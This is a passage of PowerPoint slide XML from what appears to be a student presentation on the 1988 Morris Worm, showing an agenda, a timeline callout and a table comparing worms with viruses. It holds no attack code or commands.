          <a:lstStyle/>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Gerade Verbindung mit Pfeil 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="462455" y="3699644"/>
            <a:ext cx="10909738" cy="31531"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="003366"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rechteck 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8646290" y="3598254"/>
            <a:ext cx="1064870" cy="3935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hteck 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8720111" y="3688373"/>
            <a:ext cx="75600" cy="7608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hteck 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869532" y="3688373"/>
            <a:ext cx="75600" cy="7608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hteck 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9018029" y="3688130"/>
            <a:ext cx="75600" cy="7608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hteck 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9166526" y="3688789"/>
            <a:ext cx="75600" cy="7608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hteck 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9310214" y="3688130"/>
            <a:ext cx="75600" cy="7608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hteck 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9453902" y="3688130"/>
            <a:ext cx="75600" cy="7608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hteck 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9584952" y="3688130"/>
            <a:ext cx="75600" cy="7608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Legende: mit Linie mit Akzentuierungsbalken 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10132671" y="4573980"/>
            <a:ext cx="1929114" cy="900845"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 57214"/>
              <a:gd name="adj2" fmla="val -2674"/>
              <a:gd name="adj3" fmla="val -90173"/>
              <a:gd name="adj4" fmla="val -39635"/>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1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Following weeks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Other well-publicized computer break-ins occurred</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55277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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="1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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="2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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="32"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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="3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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="4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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="5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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="5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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="62"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20"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Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Foliennummernplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Fußzeilenplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Paper Presentation – Distributed Information Processing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rechteck 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668592" y="1404130"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rechteck 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="1350818"/>
            <a:ext cx="7920992" cy="736490"/>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521437">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History</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rechteck 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669866" y="2317984"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rechteck 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="2256875"/>
            <a:ext cx="7920992" cy="1322172"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="00336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521437">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Foundations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="864337" lvl="1" indent="-342900" defTabSz="521437">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Worm vs. Virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="864337" lvl="1" indent="-342900" defTabSz="521437">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flaws of the Systems: Finger(d), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Passwords, Trusted Logins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rechteck 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669866" y="3809723"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rechteck 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="3748614"/>
            <a:ext cx="7920992" cy="1321200"/>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521437">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Functionality of the Morris Worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="864337" lvl="1" indent="-342900" defTabSz="521437">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>High-Level Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="864337" lvl="1" indent="-342900" defTabSz="521437">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detailed Functionalities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rechteck 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668592" y="5298878"/>
            <a:ext cx="617408" cy="614272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00336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gn="ctr">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi Cond" panose="020B0706030402020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rechteck 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608042" y="5239381"/>
            <a:ext cx="7920992" cy="735006"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
              <a:alpha val="70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e-DE"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="l" defTabSz="521437" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2100" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="521437" algn="l" defTabSz="521437" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2100" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1042873" algn="l" defTabSz="521437" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2100" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1564310" algn="l" defTabSz="521437" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2100" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2085746" algn="l" defTabSz="521437" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2100" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2607183" algn="l" defTabSz="521437" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2100" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3128620" algn="l" defTabSz="521437" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2100" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3650056" algn="l" defTabSz="521437" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2100" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4171493" algn="l" defTabSz="521437" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2100" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Aftermath</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1859214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Worm vs. Virus</a:t>
            </a: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1054354071"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2071074" y="1445498"/>
          <a:ext cx="8049852" cy="3651494"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{74C1A8A3-306A-4EB7-A6B1-4F7E0EB9C5D6}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2683284">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2359909599"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2683284">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="706090254"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2683284">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3031332191"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="687574">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="003366"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" dirty="0"/>
                        <a:t>Worm</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="003366"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" dirty="0"/>
                        <a:t>Virus</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="003366"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4287780410"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="740980">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>Independence in running?</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" dirty="0">
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>ü</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0"/>
                        <a:t>X</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2452059480"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="740980">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>How it spread?</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Can use a network to replicate itself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Rely on users transferring infected files/programs</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3946628614"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="740980">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>When invoked?</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Itself</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>When infected program is running</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="532052291"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="740980">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>Target</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Several</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> System</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Target Machine</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3945153218"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Foliennummernplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Textfeld 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7997951" y="5109112"/>
            <a:ext cx="2231137" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>Not in the paper, see [1]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2579642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Flaws of the Systems: Finger(d)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
